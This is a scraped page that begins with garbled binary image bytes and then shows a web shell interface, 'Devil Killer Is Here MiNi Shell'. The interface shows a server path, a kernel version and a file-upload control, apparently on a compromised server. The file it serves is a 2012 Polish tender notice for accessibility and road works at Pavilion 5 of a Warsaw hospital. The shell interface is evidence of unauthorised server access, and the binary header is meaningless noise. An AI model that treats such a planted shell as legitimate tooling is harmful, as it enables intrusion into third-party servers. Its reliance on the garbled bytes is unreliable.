JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120530/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120530/119535-N-2012.html

<p class="kh_header"><b>Warszawa: Przebudowa i modernizacja infrastruktury zewnętrznej w  Pawilonie nr 5, w  tym schodów wejściowych,  zadaszonego podjazdu dla niepełnosprawnych, wewnętrznej drogi dojazdowej do pawilonu wraz z chodnikami, roboty w zakresie gospodarki szatą roślinną</b><br>
<b>Numer ogłoszenia: 119535 - 2012; data zamieszczenia: 30.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wolski im. dr Anny Gostyńskiej Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kasprzaka 17, 01-211 Warszawa, woj. mazowieckie, tel. 022 3894859, faks 022 3894922.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wolski.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i modernizacja infrastruktury zewnętrznej w  Pawilonie nr 5, w  tym schodów wejściowych,  zadaszonego podjazdu dla niepełnosprawnych, wewnętrznej drogi dojazdowej do pawilonu wraz z chodnikami, roboty w zakresie gospodarki szatą roślinną.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.Przedmiotem zamówienia jest Pawilon nr 5 - Przebudowa i modernizacja infrastruktury zewnętrznej  (w tym: schodów wejściowych, zadaszonego podjazdu  dla niepełnosprawnych, wewnętrznej drogi dojazdowej do pawilonu wraz z chodnikami, plus roboty w zakresie gospodarki szatą roślinną).
3.2.Szpital Wolski im. dr Anny Gostyńskiej Samodzielnego Publicznego Zakładu Opieki Zdrowotnej  w Warszawie ul. Kasprzaka 17.- Pawilon nr 5 (nr działki ewidencyjnej  17 7, obręb 6-04-08.) Prace będą wykonywane  w ramach zadania inwestycyjnego pn. Przebudowa i modernizacja Szpitala Wolskiego.
3.3.Prace powinny być wykonywane zgodnie z  reżimem technologicznym, określonym przez producentów poszczególnych elementów, produktów materiałów i urządzeń.
Wszystkie użyte do realizacji przedmiotu zamówienia materiały powinny posiadać certyfikat na znak bezpieczeństwa, deklarację zgodności lub certyfikat zgodności lub aprobatą techniczną.
Cena musi uwzględniać  wszystkie koszty towarzyszące związane z realizacją przedmiotu umowy (przygotowania  dokumentów- protokoły z pomiarów, badań , itp., koniecznych do odbioru robót zgodnie  z obowiązującym prawem budowlanym).
3.4.KODY  CPV:
 Roboty budowlane w zakresie obiektów szpitalnych  CPV 45.21.51.40-0
 Roboty ziemne CPV 45.11.12.00-0
 Roboty  betonowe-podjazd ,schody  CPV 45.26.23.11-44, 45.26.23.10-7                                                     
 Zadaszenie      CPV 45.26.24.00-5, 42.61.21.00-9           
 Roboty izolacyjne                                                                    CPV 45.32.00.00-6 
Okładziny schodów, pochylni                                                   CPV 45.43.00.00-0
 Balustrady stalowe                                                                   CPV 45.42.11.60-3
 Wymiana  drzwi w przedsionku (drzwi alum. EI30,EI 60)    CPV 45.42.10.00-4
 Instalacje niskiego napięcia - linie kablowe                            CPV 45.31.56.00-4         
 Rozdzielnice                                                                             CPV 45.31.57.00-5
Instalacja oświetleniowe                                                           CPV 45.31.10.00-0
 Odwodnienie podjazdu                                                             CPV 45.11.12.40-2
 Kanalizacja deszczowa                                                             CPV 45.11.12.40-2
 Roboty ziemne                                                                          CPV 45.11.12.00-0
 Roboty montażowe                                                                   CPV 45.23.13.00-8
 Zabezpieczenie pni drzew na czas budowy                              CPV 45.11.12.00-0
 Przesadzanie drzew                                                                   CPV 45.11.12.00-0
 Usuwanie drzew z wywozem                                                    CPV 45.11.12.00-0
 Przycinanie koron drzew i krzewów                                         CPV 45.11.12.00-0
3.5.Opis przedmiotu zamówienia: 
Przedmiotem zadania są roboty budowlane wielobranżowe w zakresie  przebudowy i modernizacji infrastruktury zewnętrznej (w tym: schodów wejściowych ,   zadaszonego podjazdu  dla niepełnosprawnych,  wewnętrznej drogi  dojazdowej do pawilonu wraz z chodnikami , robotami w zakresie gospodarki szatą roślinną,  robotami towarzyszącymi) dla potrzeb Pawilonu nr 5 Szpitala Wolskiego.  
Pawilon Nr 5 - jest niedostosowany : dla osób niepełnosprawnych  oraz   transportu  chorych. 
Realizacja zadana inwestycyjnego polegała na przebudowaniu zewnętrznej infrastruktury w celu wykonania podjazdu dla karetek, pochylni dla osób niepełnosprawnych ruchowo ( wraz  z robotami towarzyszącymi).  
1.Przedmiot zamówienia należy wykonać zgodnie z : 
I.Dokumentacja projektową wykonaną w listopadzie 2009 roku  przez Biuro Architektoniczne i Sztuk  Plastycznych  SOSAK -SOSAK PROJEKT Spółka z o.o. 10-712 Olsztyn ul.  Zodiakalna  2  -   pn. Projekt budowlano- wykonawczy  dokumentacji dostosowawczej dostępu dla osób niepełnosprawnych oraz  podjazdu  dla karetek w Pawilonie nr 5   zawierającą:  
1) Projekt B.W.- branża architektura Załącznik nr 1 do SIWZ
Projektant   mgr inż. Stanisław Sosak  Sprawdzający  mgr inż. Jerzy Borowik      
 2) Projekt B.W.- branża  instalacje sanitarne Załącznik nr 2 do SIWZ Projektant   mgr inż. Eugeniusz Kutyna    Sprawdzający  inż. Janusz Żurawik
3) Projekt B.W.- branża  drogi  Załącznik nr 3    do SIWZ  Projektant   mgr inż. Zdzisław Płotek     Sprawdzający mgr inż. Dorota Wiśniewska.
II.    Dokumentacja projektową  wykonaną w listopadzie 2009 roku  przez Konstrukcje Budowlane i Inżynierskie  Sieczkowski- Nikoniuk Warszawa  ul. Ząbkowska 38a  lok.22  -  pn. Projekt budowlano- wykonawczy  dokumentacji dostosowawczej dostępu dla osób niepełnosprawnych  oraz  podjazdu  dla karetek w Pawilonie nr 5 zawierającą :
1) Projekt B.W.-  branża  konstrukcja  Załącznik nr 4 do SIWZ  Projektant    mgr inż. Artur Sieczkowski Sprawdzający   mgr inż. Wojciech Nikoniuk.
III.  Dokumentacją  projektową  wykonaną w listopadzie 2009 roku  przez Pracownie Projektową  PROEL   M. Hanowski,  Zb. Bardzicki  Olsztyn ul. Wyszyńskiego 15 p.33   pn. Projekt budowlano- wykonawczy  dokumentacji  dostosowawczej dostępu dla osób niepełnosprawnych  oraz  podjazdu dla karetek w   Pawilonie nr 5   zawierającą :
1) Projekt B.W.-  branża   elektryczna Załącznik nr 5    do SIWZ Projektant  Sprawdzający   mgr inż.  Marek  Hanowski 
 IV.   Dokumentacją projektową  wykonaną w listopadzie 2009 roku  przez PPUH VIRENS   mgr inż. Ludmiła Górnicka  Olsztyn ul. Kopernika 12B m.6-pn. Projekt budowlano- wykonawczy   dokumentacji  dostosowawczej dostępu dla  osób niepełnosprawnych oraz  podjazdu   dla karetek w   Pawilonie nr 5 zawierającą :
1) Projekt B.W.- branża architektura krajobrazu (w tym Inwentaryzacja szczegółowa zielni  i  Projekt gospodarki szatą roślinną   
Projektant  mgr inż. Ludmiła Górnicka Załącznik nr 6    do SIWZ
V.    Specyfikacją techniczną wykonania i odbioru robót budowlanych  wykonaną w listopadzie 2009 roku  przez  Biuro Architektoniczne i Sztuk  Plastycznych SOSAK  -SOSAK PROJEKT Spółka z o.o. 10-712  Olsztyn  ul.  Zodiakalna  2   dla Pochylni dla osób niepełnosprawnych oraz podjazdu dla  karetek  w Pawilonie  nr 5 Szpitala Wolskiego zawierającą;
1) Branżę: Architektura i Konstrukcja  Roboty ogólnobudowlane  Projektant  mgr inż. Stanisław Sosak Sprawdzający  mgr inż. Jerzy Borowik Załącznik nr 7 do SIWZ        
2) Branżę:  Instalacje sanitarne   Projektant   mgr inż. Eugeniusz Kutyna    Sprawdzający inż. Janusz Żurawik  Załącznik nr 8    do SIWZ        
         3) Branżę:  Drogi  Projektant   mgr inż. Zdzisław Płotek  Załącznik nr 9  do SIWZ.
VI.   Specyfikacją techniczną wykonania i odbioru robót budowlanych wykonaną w listopadzie 2009 roku przez Pracownie Projektową PROEL Marek Hanowski,  Zbigniew Bardzicki   Olsztyn ul. Wyszyńskiego 15 p.33 zawierającą :
Branżę:  Elektryczną Projektant   Zbigniew Bardzicki   Sprawdzający   mgr inż.  Marek  Hanowski  Załącznik nr 10  do SIWZ.
VII.  Specyfikacją techniczną wykonania i odbioru robót budowlanych   wykonaną w listopadzie 2009 roku  przez PPUH VIRENS mgr inż. Ludmiła Górnicka Olsztyn ul. Kopernika 12B m.6   zawierającą :
1) Branżę: Architektura krajobrazu (Usuniecie drzew i krzewów)    Projektant  mgr inż. Ludmiła Górnicka                     Załącznik nr 11    do SIWZ
VIII.   Przedmiary robót :
            -  roboty budowlane                                                     Załącznik Nr 12 do SIWZ
            -  roboty drogowe                                                        Załącznik Nr 13 do SIWZ
            -  instalacje elektryczne                                               Załącznik Nr 14 do SIWZ
            -  odwodnienie podjazdu-                                            Załącznik Nr 15 do SIWZ
            -  gospodarka szatą roślinną                                        Załącznik  Nr 16 do SIWZ
Ww. opracowania stanowią  Złączniki do Nr 1 do Nr 16 do SIWZ 
Wyżej wymienioną dokumentację można pobrać http: zp.wolski.med.pl images paw5.zip
Uwaga: Przedmiary robót są jedynie elementem pomocniczymi, nie stanowią podstawy do  wyceny oferty. 
Ofertę  na wykonanie ww prac  należy  wycenić  zgodnie z ww dokumentacją projektową specyfikacjami technicznymi i odbioru robót budowlanych, sztuką budowlaną oraz zasadami wiedzy technicznej.
Wykonawca określa cenę ryczałtową realizacji  zamówienia.    
Poza wykonaniem robót określonych powyżej, do obowiązków Wykonawcy należeć       będzie:      
1)	Ponoszenie pełnej odpowiedzialności za przyjęte metody organizacyjne podczas realizacji umowy, z zastrzeżeniem, że muszą one uwzględniać możliwość maksymalnego skrócenia  okresu wykonywania tych prac, które spowodują utrudnienia w ruchu na terenie szpitala.
2)	Niezwłocznie usuwać (na swój koszt) wszelkie awarie powstałe w związku z wykonywaniem robót;
3)	Ponoszenie pełnej odpowiedzialności za zapewnienie warunków bezpieczeństwa oraz za  metody organizacyjno-techniczne stosowane na terenie robót, a także za szkody i straty w  robotach spowodowane przy usuwaniu wad w okresie gwarancji i rękojmi.
4)	Załączone w dokumentacji projektowej - oferty należy traktować  tylko jako propozycje rozwiązania  technicznego.
Uwaga:
Informujemy, że  opłata administracyjną za wycinkę  drzew i krzewów przewidzianych do usunięcia  z zezwoleniem   ( Tabela III.1 str.10- ) oraz (ewentualna ) opłata za usuniecie formy  piennej tj. cisa (Tabela  str. 10) -   wg.  dokumentacji  w branży Architektura Krajobrazu  Inwentaryzacja  szczegółowa zieleni  i  projekt gospodarki szatą  roślinną  -   jest po stronie  Zamawiającego (który wystąpi o możliwość dokonania  nasadzeń zastępczych).  
Uwaga:
1)	Roboty   będą  prowadzone na terenie  czynnego kompleksu szpitalnego.                            
2)	W czasie prowadzenia robót, Wykonawca jest zobowiązany zapewnić bezkolizyjne  funkcjonowanie obiektu.
3)	Cena umowna musi uwzględniać  także wszystkie koszty towarzyszące związane z realizacją przedmiotu zamówienia takie jak :
    	- koszty organizacji, eksploatacji i likwidacji  zaplecza budowy 
     	 - koszty  sporządzenia wszystkich niezbędnych dokumentów (protokóły z pomiarów , z badań,  pełną obsługę  geodezyjną  wraz z  wykonanie dokumentacji geodezyjnej  powykonawczej  itp.)  koniecznych  do odbioru robót  zgodnie z  obowiązującym prawem budowlanym.
Cena umowna musi  uwzględniać  wykonanie  prac  budowlanych towarzyszących  w zakresie doprowadzenia do stanu pierwotnego biegu schodowego (wejścia z 
poziomu  terenu na parter ) na klatce schodowej. Prace obejmują:  roboty  demontażowe (demontaż  płyty stalowej perforowanej) plus roboty budowlane odtworzeniowe, drobne  roboty  malarskie (załącznik- zdjęcia obecna pochylnia  wewn.).
4)	Prace będą realizowane na podstawie: 
a)	Decyzji  - Pozwolenia na budowę
b)	Zezwolenia na wycinkę.
Dokumenty zostaną przekazanie Wykonawcy robót  przy Protokóle wprowadzenia na budowę.
5)	Zleceniodawca decyduje o kolorystyce i  fakturze materiałów (stolarka, glazura, itp.) zastosowanych do wbudowania.
6)	Wszystkie prace należy wykonać zgodnie z dokumentacja projektową, przepisami
prawa budowlanego, polska normą, przepisami B.H.P. i p. pożarowymi.
7)	Załączone w dokumentacji projektowej - oferty należy traktować  tylko jako  propozycje rozwiązania  technicznego.
8)	Kierownik budowy jest zobowiązany do przedłożenia minimum 10 dni przed protokólarnym  wprowadzeniem  budowę  wszystkich  niezbędnych  dokumentów wynikających z Prawa Budowlanego (oświadczenie, Plan BIOZ). 
9)	Nadmieniamy, że zespół budowlany Szpitala Wolskiego ujęty jest w wykazie 
zabytków nieruchomych.
10)	Z  ww dokumentacją projektową w wersji papierowej  można  się zapoznać się  w 
Sekcji Inwestycji i Remontów  Szpitala Wolskiego   tel.0 22 38 94 714.
11)	Prosimy o zapoznanie się z przedmiotem SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 Ustawy w przypadku wystąpienia okoliczności polegających na konieczności powtórzenia tego samego rodzaju zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0, 45.11.12.00-0, 45.26.23.11-4, 45.26.23.10-7, 45.26.24.00-5, 42.61.21.00-9, 45.32.00.00-6, 45.43.00.00-0, 45.42.11.60-3, 45.42.10.00-4, 45.31.56.00-4, 45.31.57.00-5, 45.31.10.00-0, 45.11.12.40-2, 45.11.12.40-2, 45.11.12.00-0, 45.23.13.00-8, 45.11.12.00-0, 45.11.12.00-0, 45.11.12.00-0, 45.11.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy przystępujący do postępowania zobowiązani są wnieść wadium kwocie: 10.320,89 zł. (słownie: dziesięć tysięcy trzysta dwadzieścia złotych i osiemdziesiąt dziewięć groszy). 
Wadium wnosi się przed upływem terminu składania ofert. 
2. Wadium może być wnoszone w jednej lub kilku następujących formach: 
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze w formie pieniężnej; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późniejszymi zmianami ). 
3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: 
	Nordea Bank Polska SA z siedziba 81-303 Gdynia ul. Kielecka 2, numer rachunku: 
	
	21 1440 1101 0000 0000 0606 2539
	wadium wniesione w pieniądzu musi wpłynąć na konto zamawiającego do upływu terminu składania ofert. 
	UWAGA!!! Kserokopię dowodu wpłaty należy dołączyć do oferty.
4. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
5. W przypadku wniesienia wadium w innej formie niż pieniądz Zamawiający wymaga złożenia oryginału dokumentu potwierdzającego wniesienie wadium w siedzibie Zamawiającego, najpóźniej w terminie składania ofert. Kserokopię wniesienia wadium w formie niepieniężnej zaleca się dołączyć do oferty. 
6. Dokument wadium wniesionego w formie gwarancji bankowej/ubezpieczeniowej powinien zawierać klauzulę o gwarantowaniu wypłaty należności w sposób nieodwołalny, bezwarunkowy, na pierwsze żądanie. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert. 
Zamawiający zwraca wadium niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 8 , 9 
8 . Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w  odpowiedzi na wezwanie o którym mowa w art. 26 ust.3, nie złoży dokumentów  lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy. 
10. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:  który wycofał ofertę przed upływem terminu składania ofert; 
11. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu 
zwrócono wadium na podstawie pkt. 7 jeżeli w wyniku ostatecznego rozstrzygnięcia protestu jego oferta uznana zostanie za najkorzystniejszą, w wyznaczonym przez Zamawiającego terminie. 
Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

